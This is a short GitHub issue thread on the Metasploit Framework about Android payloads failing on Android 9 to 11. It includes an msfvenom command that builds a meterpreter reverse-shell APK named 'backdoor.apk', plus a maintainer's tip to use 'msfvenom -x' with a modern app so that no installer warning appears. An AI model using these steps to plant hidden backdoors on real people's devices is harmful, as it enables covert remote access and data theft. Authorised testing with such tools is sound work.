rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.88k stars 13.92k forks source link

Does it work for android 9, 10 and 11? #15777

Closed D4RKH0R1Z0N closed 2 years ago

D4RKH0R1Z0N commented 2 years ago

Does the metasploit framework work from android 9, 10 and 11? When I create a payload msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT="8080 R > backdoor.apk and install it on my android 10 device it shows This app was made for older version of android Please make it support new android version like 10 and 11 and also till which version does metasploit support android version till now?

D4RKH0R1Z0N commented 2 years ago

Please make for android version 9, 10, 11 and if possible also make android encoders

timwr commented 2 years ago

Hi @D4RKH0R1Z0N

Allan1901 commented 2 years ago

@timwr What if you dont want the message to show up ? Is possible to recompile with apktool changing the android version, so there wont be any warning to be ignored ?

timwr commented 2 years ago

@vic131 using msfvenom -x with an apk built for a recent version of Android should suppress this warning?